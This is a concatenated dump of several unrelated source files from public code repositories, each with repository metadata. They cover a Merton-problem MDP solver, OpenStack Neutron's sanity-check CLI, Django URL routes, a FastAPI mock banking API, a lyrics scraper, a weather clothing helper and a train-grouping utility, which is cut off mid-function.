makeRLMDP(self) -> MDP_RL:\n '''\n Helper method used to transform the parameter definitions for this Merton problem\n into an MDP representation that can be solved using RL. Here we will prescribe a\n state-action dict, a dynamics model, and a set of terminal states.\n '''\n states = set()\n terminalStates = set()\n actions = set()\n stateActionDict = dict()\n\n # Discretize the state- and action-spaces\n # State-space discretization. We will discretize only up to\n # the max limit of growth of wealth by 5 stdevs of the highest value\n # of the risky asset return realized for each step of the total simulation time\n wStep = 0.01\n Wmax = round(self.W0 + (5*(np.max(self.cov)+np.max(self.mu))*self.SIM_TIME),2)\n N = (Wmax // wStep) + 2\n w = 0\n print(Wmax)\n for w in np.linspace(0.,Wmax,N):\n for t in range(self.SIM_TIME+1):\n if t == self.SIM_TIME:\n terminalStates.add((round(w,2), t))\n else:\n states.add((round(w,2), t))\n print(states)\n\n # Action-space discretization\n actionStep = 0.01\n aN = (1//actionStep) + 1\n for pi in np.linspace(0, 1, aN):\n for c in np.linspace(0, 1, aN):\n actions.add((pi,c))\n\n # Form the state-action dictionary\n for state in states:\n stateActionDict[state] = set()\n for action in actions:\n stateActionDict[state].add(action)\n\n\n # Declare the dynamics model to increment the state\n def dynamics(state, action):\n W, t = state\n pi, c = action\n\n # Increment time forward\n tNew = t + 1\n\n # Increment wealth forward based on action\n wNew = W + W*c*((1-pi)*self.r + pi*np.sum(np.random.multivariate_normal(self.mu, self.cov, 1))) \n wNew = round(wNew, 2)\n\n # Form the new successor state\n succState = (wNew, tNew)\n\n # If we move into a terminal state, calculate the terminal utility\n # as reward. Otherwise, reward is zero\n if tNew == self.SIM_TIME:\n reward = self.utilityFunc(wNew)\n else:\n reward = 0\n\n return succState, reward\n\n return MDP_RL(stateActionDict, terminalStates, dynamics)\n\n\nif __name__ == \"__main__\":\n # Declare params for a simple case with one risky asset\n # and one riskless asset\n params = dict()\n params[\"T\"] = 0.4\n params[\"rho\"] = 0.04\n params[\"r\"] = 0.04\n\n params[\"W0\"] = 1.00\n params[\"mu\"] = np.array([0.08])\n params[\"cov\"] = np.array([[0.0009]])\n\n params[\"epsilon\"] = 1e-8\n params[\"gamma\"] = 0.2\n\n params[\"SIM_TIME\"] = 5\n\n # Instantiate the object\n mp = MertonProblem(**params)\n\n # First, calculate the closed-form solution over our time range\n # for both allocation (constant) and consumption (return the optimal\n # consumption fraction for each timestep)\n optAlloc = mp.getCFOptAllocation()\n optCons = [mp.getCFOptConsumption(t*mp.T/mp.SIM_TIME) for t in range(mp.SIM_TIME)]\n # print(optAlloc) \n # print(optCons) \n\n # RL Solution\n ############################################\n # # Create the RL MDP representation\n # rl_mdp = mp.makeRLMDP()\n\n # # Make a random policy out of the info\n # polData = dict()\n # for state in rl_mdp.stateActionDict.keys():\n # polData[state] = dict()\n # numActions = len(rl_mdp.stateActionDict[state])\n # for action in rl_mdp.stateActionDict[state]:\n # polData[state][action] = 1/numActions\n # startPol = Policy(polData)\n \n # # Instantiate the MC solver\n # mc_eg = MonteCarloEG(rl_mdp, 1-params[\"rho\"])\n \n # startState = (params[\"W0\"], 0)\n\n # # Run simulation and perform model-free policy iteration\n # # using EG policy improvement\n # policy, optValue = mc_eg.simulate_eg(startState, startPol, 100)\n\n # # Report the results\n # for state in policy.polData.keys():\n # maxAct, _ = mu.maximizeOverDict(policy.polData[state])\n # print(maxAct)\n\n ############################################\n\n\n # Discrete MDP solution\n ############################################\n # Create the MDP representation\n mdp = mp.makeDiscretizedMDP()\n\n # Solve using value iteration\n vi = ValueIteration(1e-8)\n vi.solve(mdp)\n\n print(vi.V)\n print(vi.pi)\n\n\n","repo_name":"anatu/Stanford-CME241-W2020","sub_path":"financial_applications/merton_v2.py","file_name":"merton_v2.py","file_ext":"py","file_size_in_byte":11514,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"8670256671","text":"import sys\n\nfrom oslo_config import cfg\nfrom oslo_log import log as logging\n\nfrom neutron._i18n import _\nfrom neutron.agent import dhcp_agent\nfrom neutron.cmd.sanity import checks\nfrom neutron.common import config\nfrom neutron.conf.agent import common as agent_config\nfrom neutron.conf.agent import securitygroups_rpc\nfrom neutron.conf import common as common_config\nfrom neutron.conf.db import l3_hamode_db\nfrom neutron.conf.plugins.ml2 import config as ml2_conf\nfrom neutron.conf.plugins.ml2.drivers import linuxbridge as lb_conf\nfrom neutron.conf.plugins.ml2.drivers.mech_sriov import agent_common as \\\n sriov_conf\nfrom neutron.conf.plugins.ml2.drivers import ovs_conf\n\n\nLOG = logging.getLogger(__name__)\n\n\ndef setup_conf():\n config.register_common_config_options()\n ovs_conf.register_ovs_agent_opts(cfg.CONF)\n lb_conf.register_linuxbridge_opts(cfg.CONF)\n sriov_conf.register_agent_sriov_nic_opts(cfg.CONF)\n ml2_conf.register_ml2_plugin_opts(cfg.CONF)\n securitygroups_rpc.register_securitygroups_opts(cfg.CONF)\n dhcp_agent.register_options(cfg.CONF)\n l3_hamode_db.register_db_l3_hamode_opts(cfg.CONF)\n common_config.register_core_common_config_opts(cfg.CONF)\n\n\nclass BoolOptCallback(cfg.BoolOpt):\n def __init__(self, name, callback, **kwargs):\n if 'default' not in kwargs:\n kwargs['default'] = False\n self.callback = callback\n super(BoolOptCallback, self).__init__(name, **kwargs)\n\n\ndef check_ovs_vxlan():\n result = checks.ovs_vxlan_supported()\n if not result:\n LOG.error('Check for Open vSwitch VXLAN support failed. '\n 'Please ensure that the version of openvswitch '\n 'being used has VXLAN support.')\n return result\n\n\ndef check_ovs_geneve():\n result = checks.ovs_geneve_supported()\n if not result:\n LOG.error('Check for Open vSwitch Geneve support failed. '\n 'Please ensure that the version of openvswitch '\n 'and kernel being used has Geneve support.')\n return result\n\n\ndef check_iproute2_vxlan():\n result = checks.iproute2_vxlan_supported()\n if not result:\n LOG.error('Check for iproute2 VXLAN support failed. Please ensure '\n 'that the iproute2 has VXLAN support.')\n return result\n\n\ndef check_ovs_patch():\n result = checks.patch_supported()\n if not result:\n LOG.error('Check for Open vSwitch patch port support failed. '\n 'Please ensure that the version of openvswitch '\n 'being used has patch port support or disable features '\n 'requiring patch ports (gre/vxlan, etc.).')\n return result\n\n\ndef check_read_netns():\n required = checks.netns_read_requires_helper()\n if not required and cfg.CONF.AGENT.use_helper_for_ns_read:\n LOG.warning(\"The user that is executing neutron can read the \"\n \"namespaces without using the root_helper. Disable \"\n \"the use_helper_for_ns_read option to avoid a \"\n \"performance impact.\")\n # Don't fail because nothing is actually broken. Just not optimal.\n result = True\n elif required and not cfg.CONF.AGENT.use_helper_for_ns_read:\n LOG.error(\"The user that is executing neutron does not have \"\n \"permissions to read the namespaces. Enable the \"\n \"use_helper_for_ns_read configuration option.\")\n result = False\n else:\n # everything is configured appropriately\n result = True\n return result\n\n\n# NOTE(ihrachyshka): since the minimal version is currently capped due to\n# missing hwaddr matching in dnsmasq < 2.67, a better version of the check\n# would actually start dnsmasq server and issue a DHCP request using a IPv6\n# DHCP client.\ndef check_dnsmasq_version():\n result = checks.dnsmasq_version_supported()\n if not result:\n LOG.error('The installed version of dnsmasq is too old. '\n 'Please update to at least version %s.',\n checks.get_minimal_dnsmasq_version_supported())\n return result\n\n\ndef check_ovs_qos_direct_ports_supported():\n result = checks.ovs_qos_direct_port_supported()\n if not result:\n LOG.error('The installed version of OVS does not support '\n 'QoS rules for direct ports. '\n 'Please update to version %s or newer.',\n checks.get_ovs_version_for_qos_direct_port_support())\n return result\n\n\ndef check_dnsmasq_local_service_supported():\n result = checks.dnsmasq_local_service_supported()\n if not result:\n LOG.error('The installed version of dnsmasq is too old. '\n 'Please update to a version supporting the '\n '--local-service option.')\n return result\n\n\ndef check_keepalived_ipv6_support():\n result = checks.keepalived_ipv6_supported()\n if not result:\n LOG.error('The installed version of keepalived does not support '\n 'IPv6. Please update to at least version 1.2.10 for '\n 'IPv6 support.')\n return result\n\n\ndef check_keepalived_garp_on_sighup_support():\n result = checks.keepalived_garp_on_sighup_supported()\n if not result:\n LOG.error('The installed version of keepalived may not support '\n 'sending gratious ARP on SIGHUP, which may delay '\n 'dataplane downtime during HA router failover. '\n 'Please use at least version 1.2.20 which support '\n 'sending garp on SIGHUP.')\n return result\n\n\ndef check_dibbler_version():\n result = checks.dibbler_version_supported()\n if not result:\n LOG.error('The installed version of dibbler-client is too old. '\n 'Please update to at least version %s.',\n checks.get_minimal_dibbler_version_supported())\n return result\n\n\ndef check_nova_notify():\n result = checks.nova_notify_supported()\n if not result:\n LOG.error('Nova notifications are enabled, but novaclient is not '\n 'installed. Either disable nova notifications or '\n 'install python-novaclient.')\n return result\n\n\ndef check_arp_responder():\n result = checks.arp_responder_supported()\n if not result:\n LOG.error('Check for Open vSwitch ARP responder support failed. '\n 'Please ensure that the version of openvswitch '\n 'being used has ARP flows support.')\n return result\n\n\ndef check_arp_header_match():\n result = checks.arp_header_match_supported()\n if not result:\n LOG.error('Check for Open vSwitch support of ARP header matching '\n 'failed. ARP spoofing suppression will not work. A '\n 'newer version of OVS is required.')\n return result\n\n\ndef check_icmpv6_header_match():\n result = checks.icmpv6_header_match_supported()\n if not result:\n LOG.error('Check for Open vSwitch support of ICMPv6 header '\n 'matching failed. ICMPv6 Neighbor Advt spoofing (part '\n 'of arp spoofing) suppression will not work. A newer '\n 'version of OVS is required.')\n return result\n\n\ndef check_ovsdb_native():\n result = checks.ovsdb_native_supported()\n if not result:\n LOG.error('Check for native OVSDB support failed.')\n return result\n\n\ndef check_ovs_conntrack():\n result = checks.ovs_conntrack_supported()\n if not result:\n LOG.error('Check for Open vSwitch support of conntrack support '\n 'failed. OVS/CT firewall will not work. A newer '\n 'version of OVS (2.5+) and linux kernel (4.3+) are '\n 'required. See '\n 'https://github.com/openvswitch/ovs/blob/master/FAQ.md '\n 'for more information.')\n return result\n\n\ndef check_gre_conntrack():\n result = checks.gre_conntrack_supported()\n if not result:\n LOG.warning('Kernel module %s is not loaded. GRE tunnels from '\n 'VM to VM will not work with OVS firewall driver.',\n checks.CONNTRACK_GRE_MODULE)\n return result\n\n\ndef check_ebtables():\n result = checks.ebtables_supported()\n if not result:\n LOG.error('Cannot run ebtables. Please ensure that it '\n 'is installed.')\n return result\n\n\ndef check_ipset():\n result = checks.ipset_supported()\n if not result:\n LOG.error('Cannot run ipset. Please ensure that it '\n 'is installed.')\n return result\n\n\ndef check_ip6tables():\n result = checks.ip6tables_supported()\n if not result:\n LOG.error('Cannot run ip6tables. Please ensure that it '\n 'is installed.')\n return result\n\n\ndef check_conntrack():\n result = checks.conntrack_supported()\n if not result:\n LOG.error('Cannot run conntrack. Please ensure that it '\n 'is installed.')\n return result\n\n\ndef check_dhcp_release6():\n result = checks.dhcp_release6_supported()\n if not result:\n LOG.error('No dhcp_release6 tool detected. The installed version '\n 'of dnsmasq does not support releasing IPv6 leases. '\n 'Please update to at least version %s if you need this '\n 'feature. If you do not use IPv6 stateful subnets you '\n 'can continue to use this version of dnsmasq, as '\n 'other IPv6 address assignment mechanisms besides '\n 'stateful DHCPv6 should continue to work without '\n 'the dhcp_release6 utility. '\n 'Current version of dnsmasq is ok if other checks '\n 'pass.',\n checks.get_dnsmasq_version_with_dhcp_release6())\n return result\n\n\ndef check_bridge_firewalling_enabled():\n result = checks.bridge_firewalling_enabled()\n if not result:\n LOG.error('Bridge firewalling is not enabled. It may be the case '\n 'that bridge and/or br_netfilter kernel modules are not '\n 'loaded. Alternatively, corresponding sysctl settings '\n 'may be overridden to disable it by default.')\n return result\n\n\ndef check_ip_nonlocal_bind():\n result = checks.ip_nonlocal_bind()\n if not result:\n LOG.error('This kernel does not isolate ip_nonlocal_bind kernel '\n 'option in namespaces. Please update to kernel '\n 'version > 3.19.')\n return result\n\n\ndef check_min_tx_rate_support():\n result = checks.min_tx_rate_support()\n if not result:\n LOG.warning('There are SR-IOV network interfaces that do not support '\n 'setting the minimum TX rate (dataplane enforced minimum '\n 'guaranteed bandwidth) \"ip-link vf min_tx_rate\".')\n return result\n\n\ndef check_ovn_nb_db_schema_port_group_support():\n result = checks.ovn_nb_db_schema_port_group_supported()\n if not result:\n LOG.warning('OVN NB DB schema does not support Port_Group. This '\n 'support was added in DB schema version 5.11.')\n return result\n\n\ndef check_ovn_nb_db_schema_stateless_nat():\n result = checks.ovn_nb_db_schema_stateless_nat_supported()\n if not result:\n LOG.warning('OVN NB DB schema does not support stateless NAT. This '\n 'support was added in DB schema version 5.17.')\n return result\n\n\ndef check_ovn_sb_db_schema_virtual_port():\n result = checks.ovn_sb_db_schema_virtual_port_supported()\n if not result:\n LOG.warning('OVN SB DB schema does not support virtual ports. This '\n 'support was added in DB schema version 2.5.')\n return result\n\n\ndef check_ovn_nb_db_schema_gateway_chassis():\n result = checks.ovn_nb_db_schema_gateway_chassis_supported()\n if not result:\n LOG.warning('OVN NB DB schema does not support \"Chassis_Gateway\" '\n 'table. This support was added in DB schema version 5.7.')\n return result\n\n\ndef check_ovn_localnet_learn_fdb_support():\n result = checks.ovn_localnet_learn_fdb_support()\n if not result:\n LOG.warning('OVN does not support localnet_learn_fdb option. '\n 'This support was added in OVN 22.09.')\n return result\n\n\n# Define CLI opts to test specific features, with a callback for the test\nOPTS = [\n BoolOptCallback('ovs_vxlan', check_ovs_vxlan, default=False,\n help=_('Check for OVS vxlan support')),\n BoolOptCallback('ovs_geneve', check_ovs_geneve, default=False,\n help=_('Check for OVS Geneve support')),\n BoolOptCallback('iproute2_vxlan', check_iproute2_vxlan, default=False,\n help=_('Check for iproute2 vxlan support')),\n BoolOptCallback('ovs_patch', check_ovs_patch, default=True,\n help=_('Check for patch port support')),\n BoolOptCallback('nova_notify', check_nova_notify,\n help=_('Check for nova notification support')),\n BoolOptCallback('arp_responder', check_arp_responder,\n help=_('Check for ARP responder support')),\n BoolOptCallback('arp_header_match', check_arp_header_match,\n help=_('Check for ARP header match support')),\n BoolOptCallback('icmpv6_header_match', check_icmpv6_header_match,\n help=_('Check for ICMPv6 header match support')),\n BoolOptCallback('read_netns', check_read_netns,\n help=_('Check netns permission settings')),\n BoolOptCallback('dnsmasq_local_service_supported',\n check_dnsmasq_local_service_supported,\n help=_('Check for local-service support in dnsmasq')),\n BoolOptCallback('ovs_qos_direct_port_supported',\n check_ovs_qos_direct_ports_supported,\n help=_('Check if the ovs supports QoS for direct ports')),\n BoolOptCallback('dnsmasq_version', check_dnsmasq_version,\n help=_('Check minimal dnsmasq version'),\n deprecated_for_removal=True,\n deprecated_since='Pike'),\n BoolOptCallback('ovsdb_native', check_ovsdb_native,\n help=_('Check ovsdb native interface support')),\n BoolOptCallback('ovs_conntrack', check_ovs_conntrack,\n help=_('Check ovs conntrack support')),\n BoolOptCallback('gre_conntrack', check_gre_conntrack,\n help=_('Check if conntrack for gre tunnels traffic is '\n 'supported')),\n BoolOptCallback('ebtables_installed', check_ebtables,\n help=_('Check ebtables installation')),\n BoolOptCallback('keepalived_ipv6_support', check_keepalived_ipv6_support,\n help=_('Check keepalived IPv6 support')),\n BoolOptCallback('keepalived_garp_on_sighup_support',\n check_keepalived_garp_on_sighup_support,\n help=_('Check keepalived support sending garp on '\n 'SIGHUP.')),\n BoolOptCallback('dibbler_version', check_dibbler_version,\n help=_('Check minimal dibbler version'),\n deprecated_for_removal=True,\n deprecated_since='Pike'),\n BoolOptCallback('ipset_installed', check_ipset,\n help=_('Check ipset installation')),\n BoolOptCallback('ip6tables_installed', check_ip6tables,\n help=_('Check ip6tables installation')),\n BoolOptCallback('conntrack_installed', check_conntrack,\n help=_('Check conntrack installation')),\n BoolOptCallback('dhcp_release6', check_dhcp_release6,\n help=_('Check dhcp_release6 installation')),\n BoolOptCallback('bridge_firewalling', check_bridge_firewalling_enabled,\n help=_('Check bridge firewalling'),\n default=False),\n BoolOptCallback('ip_nonlocal_bind', check_ip_nonlocal_bind,\n help=_('Check ip_nonlocal_bind kernel option works with '\n 'network namespaces.'),\n default=False),\n BoolOptCallback('check_min_tx_rate_support', check_min_tx_rate_support,\n help=_('Check if the configured SR-IOV NICs support '\n 'the \"ip-link vf min_tx_rate\" parameter.'),\n default=False),\n BoolOptCallback('ovn_nb_db_schema_port_group_support',\n check_ovn_nb_db_schema_port_group_support,\n help=_('Check OVN NB DB schema support Port_Group'),\n default=False),\n BoolOptCallback('ovn_nb_db_schema_stateless_nat_support',\n check_ovn_nb_db_schema_stateless_nat,\n help=_('Check OVN NB DB schema support stateless NAT'),\n default=False),\n BoolOptCallback('ovn_sb_db_schema_virtual_port_support',\n check_ovn_sb_db_schema_virtual_port,\n help=_('Check OVN SB DB schema support virtual ports'),\n default=False),\n BoolOptCallback('ovn_nb_db_schema_gateway_chassis_support',\n check_ovn_nb_db_schema_gateway_chassis,\n help=_('Check OVN NB DB schema support Gateway_Chassis'),\n default=False),\n BoolOptCallback('ovn_localnet_learn_fdb_support',\n check_ovn_localnet_learn_fdb_support,\n help=_('Check OVN supports localnet_learn_fdb option'),\n default=False),\n]\n\n\ndef enable_tests_from_config():\n \"\"\"If a test can depend on configuration, use this function to set the\n appropriate CLI option to enable that test. It will then be possible to\n run all necessary tests, just by passing in the appropriate configs.\n \"\"\"\n\n cfg.CONF.set_default('arp_header_match', True)\n cfg.CONF.set_default('icmpv6_header_match', True)\n if 'vxlan' in cfg.CONF.AGENT.tunnel_types:\n cfg.CONF.set_default('ovs_vxlan', True)\n if 'geneve' in cfg.CONF.AGENT.tunnel_types:\n cfg.CONF.set_default('ovs_geneve', True)\n if ('vxlan' in cfg.CONF.ml2.type_drivers or\n cfg.CONF.VXLAN.enable_vxlan):\n cfg.CONF.set_default('iproute2_vxlan', True)\n if (cfg.CONF.notify_nova_on_port_status_changes or\n cfg.CONF.notify_nova_on_port_data_changes):\n cfg.CONF.set_default('nova_notify', True)\n if cfg.CONF.AGENT.arp_responder:\n cfg.CONF.set_default('arp_responder', True)\n if not cfg.CONF.AGENT.use_helper_for_ns_read:\n cfg.CONF.set_default('read_netns', True)\n if cfg.CONF.dhcp_driver == 'neutron.agent.linux.dhcp.Dnsmasq':\n cfg.CONF.set_default('dnsmasq_local_service_supported', True)\n cfg.CONF.set_default('dnsmasq_version', True)\n if cfg.CONF.l3_ha:\n cfg.CONF.set_default('keepalived_ipv6_support', True)\n cfg.CONF.set_default('ip_nonlocal_bind', True)\n if cfg.CONF.SECURITYGROUP.enable_ipset:\n cfg.CONF.set_default('ipset_installed', True)\n if cfg.CONF.SECURITYGROUP.enable_security_group:\n cfg.CONF.set_default('ip6tables_installed', True)\n if cfg.CONF.SECURITYGROUP.firewall_driver in (\n 'iptables',\n 'iptables_hybrid',\n ('neutron.agent.linux.iptables_firewall.'\n 'IptablesFirewallDriver'),\n ('neutron.agent.linux.iptables_firewall.'\n 'OVSHybridIptablesFirewallDriver'),\n ):\n cfg.CONF.set_default('bridge_firewalling', True)\n if cfg.CONF.SRIOV_NIC.physical_device_mappings:\n cfg.CONF.set_default('check_min_tx_rate_support', True)\n if 'ovn' in cfg.CONF.ml2.mechanism_drivers:\n cfg.CONF.set_default('ovn_nb_db_schema_port_group_support', True)\n cfg.CONF.set_default('ovn_nb_db_schema_stateless_nat_support', True)\n cfg.CONF.set_default('ovn_sb_db_schema_virtual_port_support', True)\n cfg.CONF.set_default('ovn_nb_db_schema_gateway_chassis_support', True)\n\n\ndef all_tests_passed():\n return all(opt.callback() for opt in OPTS if cfg.CONF.get(opt.name))\n\n\ndef main():\n setup_conf()\n cfg.CONF.register_cli_opts(OPTS)\n cfg.CONF.set_override('use_stderr', True)\n config.setup_logging()\n config.init(sys.argv[1:], default_config_files=[])\n agent_config.setup_privsep()\n\n if cfg.CONF.config_file:\n enable_tests_from_config()\n\n return 0 if all_tests_passed() else 1\n","repo_name":"openstack/neutron","sub_path":"neutron/cmd/sanity_check.py","file_name":"sanity_check.py","file_ext":"py","file_size_in_byte":20367,"program_lang":"python","lang":"en","doc_type":"code","stars":1353,"dataset":"github-code","pt":"72"} +{"seq_id":"27682455567","text":"\nfrom django.urls import path,include\nfrom .views import department_details, list_departments, create_employee, edit_employee\n\nurlpatterns = [\n path('',department_details,name='details'),\n path('/',list_departments,name='list'),\n path('create/',create_employee,name='create_employee'),\n path('edit//',edit_employee,name='edit_employee')\n]","repo_name":"darimachine/SoftUniWebBasicsProjects","sub_path":"employees_app/employees_app/employees/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4541596068","text":"import os\nfrom setuptools import setup, find_packages\nimport md_urlunshorten_users as app\n\n\ndef read(fname):\n try:\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n except IOError:\n return ''\n\n\nsetup(\n name=\"md-urlunshorten-users\",\n version=app.__version__,\n description=read('DESCRIPTION'),\n long_description=read('README.rst'),\n license='The MIT License',\n platforms=['OS Independent'],\n keywords='django, metrics, dashboard, widget, urlunshorten',\n author='Martin Brochhaus',\n author_email='mbrochh@gmail.com',\n url=\"https://github.com/bitmazk/md-urlunshorten-users\",\n packages=find_packages(),\n include_package_data=True,\n)\n","repo_name":"bitlabstudio/md-urlunshorten-users","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"27793012059","text":"from datetime import date, timezone\nfrom random import choice\nfrom typing import List\n\nfrom fastapi import APIRouter, Depends, UploadFile, status\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\nfrom db.db import get_session\nfrom exceptions import base as exceptions\nfrom models import base as models\nfrom schemas import base as schemas\nfrom services.db import (account_crud, transaction_crud, user_cashback_crud,\n user_crud)\n\nrouter = APIRouter()\n\n\n@router.post(\n '/get_user/',\n status_code=status.HTTP_200_OK,\n response_model=schemas.User\n)\nasync def get_user(\n user_credentials: schemas.UserCredentials,\n db: AsyncSession = Depends(get_session)\n) -> schemas.User:\n users: List[models.User] = await user_crud.all(db)\n user: models.User = choice(users)\n return schemas.User.from_orm(user)\n\n\n@router.post(\n '/get_user_by_photo/',\n status_code=status.HTTP_200_OK,\n response_model=schemas.User\n)\nasync def get_user_by_photo(\n file_in: UploadFile,\n db: AsyncSession = Depends(get_session)\n) -> schemas.User:\n users: List[models.User] = await user_crud.all(db)\n user: models.User = choice(users)\n return schemas.User.from_orm(user)\n\n\n@router.get( \n '/get_user_accounts/',\n status_code=status.HTTP_200_OK,\n response_model=List[schemas.Account]\n)\nasync def get_user_accounts(\n user_id: int,\n db: AsyncSession = Depends(get_session)\n) -> List[schemas.Account]:\n user: models.User | None = await user_crud.get(db, id=user_id)\n if not user:\n raise exceptions.UserNotFoundException\n accounts: List[models.Account] = await account_crud.filter_by(\n db=db, with_cards=True,\n with_bank=True, user_id=user_id\n )\n\n return [\n schemas.Account(\n bank=account.bank.name,\n number=account.number,\n cards=[\n schemas.Card(\n card_number=card.card_number\n )\n for card in account.cards\n ]\n )\n for account in accounts\n ]\n\n\n@router.post(\n '/get_account_cashbacks/',\n status_code=status.HTTP_200_OK,\n response_model=schemas.AccountWithCashbacks\n)\nasync def get_account_cashback(\n account: schemas.AccountRequest,\n db: AsyncSession = Depends(get_session)\n) -> schemas.AccountWithCashbacks:\n cashbacks = await user_cashback_crud.account_cashbacks(\n db=db,\n account_number=account.account_number,\n month=account.month\n )\n \n return schemas.AccountWithCashbacks(\n month=account.month,\n cashbacks=[\n schemas.AccountCashback(\n product_type=cashback.cashback.product_type,\n value=cashback.value\n )\n for cashback in cashbacks\n ]\n )\n\n\n@router.post(\n '/get_account_transactions/',\n status_code=status.HTTP_200_OK,\n response_model=schemas.AccountWithTransactions\n)\nasync def get_account_transactions(\n data: schemas.TransactionsRequest,\n db: AsyncSession = Depends(get_session)\n) -> schemas.AccountWithTransactions:\n transactions = await transaction_crud.get_account_transactions(\n db=db, account_number=data.account_number,\n start_datetime=data.start_datetime\n )\n\n return schemas.AccountWithTransactions(\n number=data.account_number,\n transactions=[\n schemas.Transaction.from_orm(transaction)\n for transaction in transactions\n ]\n )\n","repo_name":"AlexStr94/finodays","sub_path":"mock_server/api/v1/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36776019578","text":"from django.contrib.auth import get_user_model\n\nUser = get_user_model()\n\nWIND_ALPHA_TABLE = (\n (0, 7),\n (.6, 10.5),\n (1.8, 16.7),\n (3.5, 24.2),\n (5.3, 32.4),\n (7.5, 40.6),\n (9.9, 49.5),\n (12.5, 58.2),\n (15.3, 68.7),\n (18.3, 79),\n (21.6, 91),\n (25.2, 105),\n (29, 116.3)\n)\n\n\nWEAR_CLO = (\n (0.3, 'Трусы, футболка, шорты, легкие носки, сандалии'),\n (0.6, 'Мужская одежда: рубашка с короткими рукавами, легкие брюки, легкие носки, обувь.'\n 'Женская одежда: Трусы, женское белье, чулки, платье, обувь'),\n (1.0, 'Мужская одежда: Трусы, рубашка, брюки, пиджак, носки, обувью'\n 'Женская одежда: Трусы, чулки, блузка, длинная юбка, пиджак, обувь'),\n (1.3, 'Нижняя одежда с длинными рукавами и штанинами, рубашка, '\n 'брюки, свитер, пиджак, носки, обувь'),\n (1.5, 'Нижняя одежда с короткими рукавами и штанинами, рубашка, '\n 'брюки, жилет, пиджак, пальто, носки, обувь'),\n (2.0, 'Нижняя одежда с короткими рукавами и штанинами, '\n 'рубашка, брюки, пиджак, '\n ' стеганая куртка и штаны, носки, обувь, шапка, перчатки'),\n (2.55, 'Нижняя одежда с длинными рукавами и штанинами, термозащитная куртка и брюки, '\n 'парка (аляска) с тяжелой подбивкой, штаны с тяжелой подбивкой, носки, обувь, шапка, перчатки')\n)\n\n\ndef get_alpha(wind_speed):\n l, r = -1, 12\n while r - l > 1:\n m = (r + l) // 2\n if WIND_ALPHA_TABLE[m][0] < wind_speed:\n l = m\n else:\n r = m\n return WIND_ALPHA_TABLE[r][1]\n\n\ndef get_general_wear_recomendation(CLO):\n l, r = -1, 6\n while r - l > 1:\n m = (r + l) // 2\n if CLO > WEAR_CLO[m][0]:\n l = m\n else:\n r = m\n return WEAR_CLO[r]\n","repo_name":"IgnatInyutsin/weather-app","sub_path":"backend/api/restapi/app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70004502312","text":"from bs4 import BeautifulSoup\nimport requests\nfrom requests.exceptions import ConnectionError, ChunkedEncodingError\nfrom langdetect import detect\nimport re\nfrom tqdm import trange\nimport os\n\nsongs_folder = '../songs/'\nfiles_skipped = 0\ntry:\n with open('songs_done.txt', 'r') as done_file:\n count = done_file.readline()\n count = int(count)\nexcept FileNotFoundError:\n count = -1\nwith open('links.txt', 'r') as f:\n links = f.readlines()\n for i in trange(len(links)):\n if i <= count:\n continue\n link = links[i]\n try:\n html = requests.get(link).text\n except ConnectionError or ChunkedEncodingError:\n continue\n soup = BeautifulSoup(html, 'html.parser')\n song = soup.find_all('p', {'class': 'songtext'})[0]\n song_filtered = song.get_text()\n try:\n lang = detect(song_filtered[:50])\n except Exception:\n continue\n if lang != 'en':\n with open('songs_done.txt', 'w') as done_file:\n done_file.write(str(i))\n continue\n song_title = re.findall(r'/s.*?.html', link)[0][1:-5]\n try:\n with open(songs_folder + song_title + '.txt', 'w') as sf:\n sf.write(song_filtered)\n except UnicodeEncodeError as err:\n print(song_title + lang)\n print('%d files skipped' % (files_skipped + 1))\n files_skipped += 1\n try:\n os.remove(songs_folder + song_title + '.txt')\n except FileNotFoundError:\n print('Skipped file is not deleted because it is not there')\n with open('songs_done.txt', 'w') as done_file:\n done_file.write(str(i))\n","repo_name":"bharadwajpro/Tf-Idf-","sub_path":"Assignment-1/scraping/getlyrics.py","file_name":"getlyrics.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31538118825","text":"from .utils import grouper\n\n\ndef get_day_groups(trains):\n \"\"\"\n Get a list of all distinctive sets of days\n\n get_day_groups([\n Train(days={1, 2, 3}),\n Train(days={0, 1}),\n Train(days={4}),\n ])\n => [{0}, {1}, {2, 3}, {4}]\n \"\"\"\n day_sets = {frozenset(train.days) for train in trains}\n all_days = frozenset.union(*day_sets)\n groups = {all_days}\n\n for day_set in day_sets:\n couples = ((group & day_set, group - day_set) for group in groups)\n groups = {group for couple in couples for group in couple if group}\n\n return sorted(groups, key=tuple)\n\n\n# Fix: find trains of the previous day?\ndef get_next_train(train, trains):\n \"Get direct/earliest connection after a train\"\n trains = [t for t in trains if t.departure_time > train.arrival_time]\n if trains:\n return min(trains, key=lambda t: t.departure_time)\n\n\ndef get_prev_train(train, trains):\n \"Get direct/latest connection before a train\"\n trains = [t for t in trains if t.arrival_time < train.departure_time]\n if trains:\n return max(trains, key=lambda t: t.arrival_time)\n\n\ndef group_trains(trains, sorted_stops):\n \"\"\"\n Group trains by connections\n All trains that are connected belong to a same group\n Return sorted groups as lists of trains\n\n group_trains([\n Train('T', '#1', viridian=time(12, 30), pewter=time(13, 0)),\n Train('T', '#2', viridian=time(16, 0), pewter=time(16, 30)),\n Train('T', '#3', pewter=time(13, 30), cerulean=time(14, 30)),\n Train('T', '#4', pewter=time(17, 0), cerulean=time(18, 0)),\n ], ['viridian', 'pewter', 'cerulean'])\n => [\n [Train('T', '#1', ...), Train('T', '#3', ...)],\n [Train('T', '#2', ...), Train('T', '#4', ...)],\n ]\n \"\"\"\n trains_from_stop = {stop: [] for stop in sorted_stops}\n trains_to_stop = {stop: [] for stop in sorted_stops}\n\n with grouper() as g:\n for train in trains:\n # 